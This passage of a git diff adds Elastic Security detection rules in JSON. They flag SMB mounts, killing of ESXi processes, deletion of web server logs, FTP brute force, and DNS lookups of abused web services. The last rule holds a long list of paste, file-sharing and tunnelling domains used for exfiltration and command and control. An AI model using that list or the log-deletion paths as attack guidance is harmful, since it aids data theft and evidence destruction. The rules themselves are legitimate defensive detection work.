"logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Attempt to Mount SMB Share via Command Line", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n (\n process.name : \"mount_smbfs\" or\n (process.name : \"open\" and process.args : \"smb://*\") or\n (process.name : \"mount\" and process.args : \"smbfs\") or\n (process.name : \"osascript\" and process.command_line : \"osascript*mount volume*smb://*\")\n ) and\n not process.parent.executable : \"/Applications/Google Drive.app/Contents/MacOS/Google Drive\"\n", + "references": [ + "https://www.freebsd.org/cgi/man.cgi?mount_smbfs", + "https://ss64.com/osx/mount.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "661545b4-1a90-4f45-85ce-2ebd7c6a15d0", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "661545b4-1a90-4f45-85ce-2ebd7c6a15d0_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_6.json b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_6.json new file mode 100644 index 00000000000..4a80c88c502 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_6.json @@ -0,0 +1,82 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where VMware processes, such as \"vmware-vmx\" or \"vmx,\" are terminated on a Linux system by a \"kill\" command. The rule monitors for the \"end\" event type, which signifies the termination of a process. The presence of a \"kill\" command as the parent process for terminating VMware processes may indicate that a threat actor is attempting to interfere with the virtualized environment on the targeted system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Termination of ESXI Process", + "query": "process where host.os.type == \"linux\" and event.type == \"end\" and process.name in (\"vmware-vmx\", \"vmx\")\nand process.parent.name == \"kill\"\n", + "references": [ + "https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6641a5af-fb7e-487a-adc4-9e6503365318", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Impact", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1489", + "name": "Service Stop", + "reference": "https://attack.mitre.org/techniques/T1489/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "6641a5af-fb7e-487a-adc4-9e6503365318_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_105.json b/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_105.json new file mode 100644 index 00000000000..8426e58fcb6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_105.json @@ -0,0 +1,77 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the deletion of WebServer access logs. This may indicate an attempt to evade detection or destroy forensic evidence on a system.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "WebServer Access Logs Deleted", + "query": "file where event.type == \"deletion\" and\n file.path : (\"C:\\\\inetpub\\\\logs\\\\LogFiles\\\\*.log\",\n \"/var/log/apache*/access.log\",\n \"/etc/httpd/logs/access_log\",\n \"/var/log/httpd/access_log\",\n \"/var/www/*/logs/access.log\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "665e7a4f-c58e-4fc6-bc83-87a7572670ac", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 105 + }, + "id": "665e7a4f-c58e-4fc6-bc83-87a7572670ac_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_6.json b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_6.json new file mode 100644 index 00000000000..0400b6c6402 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_6.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An FTP (file transfer protocol) brute force attack is a method where an attacker systematically tries different combinations of usernames and passwords to gain unauthorized access to an FTP server, and if successful, the impact can include unauthorized data access, manipulation, or theft, compromising the security and integrity of the server and potentially exposing sensitive information. This rule identifies multiple consecutive authentication failures targeting a specific user account from the same source address and within a short time interval, followed by a successful authentication.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Successful Linux FTP Brute Force Attack Detected", + "query": "sequence by host.id, auditd.data.addr, related.user with maxspan=5s\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and\n auditd.data.terminal == \"ftp\" and event.outcome == \"failure\" and auditd.data.addr != null and\n auditd.data.addr != \"0.0.0.0\" and auditd.data.addr != \"::\"] with runs=10\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and\n auditd.data.terminal == \"ftp\" and event.outcome == \"success\" and auditd.data.addr != null and\n auditd.data.addr != \"0.0.0.0\" and auditd.data.addr != \"::\"] | tail 1\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.addr", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.terminal", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "related.user", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "66712812-e7f2-4a1d-bbda-dd0b5cf20c5d", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required to be added to the integration.\n\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 6 + }, + "id": "66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_7.json b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_7.json new file mode 100644 index 00000000000..2d198430803 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_7.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An FTP (file transfer protocol) brute force attack is a method where an attacker systematically tries different combinations of usernames and passwords to gain unauthorized access to an FTP server, and if successful, the impact can include unauthorized data access, manipulation, or theft, compromising the security and integrity of the server and potentially exposing sensitive information. This rule identifies multiple consecutive authentication failures targeting a specific user account from the same source address and within a short time interval, followed by a successful authentication.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Successful Linux FTP Brute Force Attack Detected", + "query": "sequence by host.id, auditd.data.addr, related.user with maxspan=5s\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and\n auditd.data.terminal == \"ftp\" and event.outcome == \"failure\" and auditd.data.addr != null and\n auditd.data.addr != \"0.0.0.0\" and auditd.data.addr != \"::\"] with runs=10\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and\n auditd.data.terminal == \"ftp\" and event.outcome == \"success\" and auditd.data.addr != null and\n auditd.data.addr != \"0.0.0.0\" and auditd.data.addr != \"::\"] | tail 1\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.addr", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.terminal", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "related.user", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "66712812-e7f2-4a1d-bbda-dd0b5cf20c5d", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required to be added to the integration.\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 7 + }, + "id": "66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_111.json b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_111.json new file mode 100644 index 00000000000..0e37a31cb56 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_111.json @@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.network-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Connection to Commonly Abused Web Services", + "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"github.com\",\n \"pastebin.*\",\n \"paste4btc.com\",\n \"paste.ee\",\n \"ghostbin.com\",\n \"drive.google.com\",\n \"?.docs.live.net\",\n \"api.dropboxapi.*\",\n \"content.dropboxapi.*\",\n \"dl.dropboxusercontent.*\",\n \"api.onedrive.com\",\n \"*.onedrive.org\",\n \"onedrive.live.com\",\n \"filebin.net\",\n \"*.ngrok.io\",\n \"ngrok.com\",\n \"*.portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"slack.com\",\n \"api.slack.com\",\n \"slack-redir.net\",\n \"slack-files.com\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\",\n \"apis.azureedge.net\",\n \"cdn.sql.gg\",\n \"?.top4top.io\",\n \"top4top.io\",\n \"www.uplooder.net\",\n \"*.cdnmegafiles.com\",\n \"transfer.sh\",\n \"gofile.io\",\n \"updates.peer2profit.com\",\n \"api.telegram.org\",\n \"t.me\",\n \"meacz.gq\",\n \"rwrd.org\",\n \"*.publicvm.com\",\n \"*.blogspot.com\",\n \"api.mylnikov.org\",\n \"file.io\",\n \"stackoverflow.com\",\n \"*files.1drv.com\",\n \"api.anonfile.com\",\n \"*hosting-profi.de\",\n \"ipbase.com\",\n \"ipfs.io\",\n \"*up.freeo*.space\",\n \"api.mylnikov.org\",\n \"script.google.com\",\n \"script.googleusercontent.com\",\n \"api.notion.com\",\n \"graph.microsoft.com\",\n \"*.sharepoint.com\",\n \"mbasic.facebook.com\",\n \"login.live.com\",\n \"api.gofile.io\",\n \"api.anonfiles.com\",\n \"api.notion.com\",\n \"api.trello.com\",\n \"gist.githubusercontent.com\",\n \"files.pythonhosted.org\",\n \"g.live.com\",\n \"*.zulipchat.com\",\n \"graph.microsoft.com\") and \n \n /* Insert noisy false positives here */\n not (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\BraveSoftware\\\\*\\\\Application\\\\brave.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Vivaldi\\\\Application\\\\vivaldi.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera*\\\\opera.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n 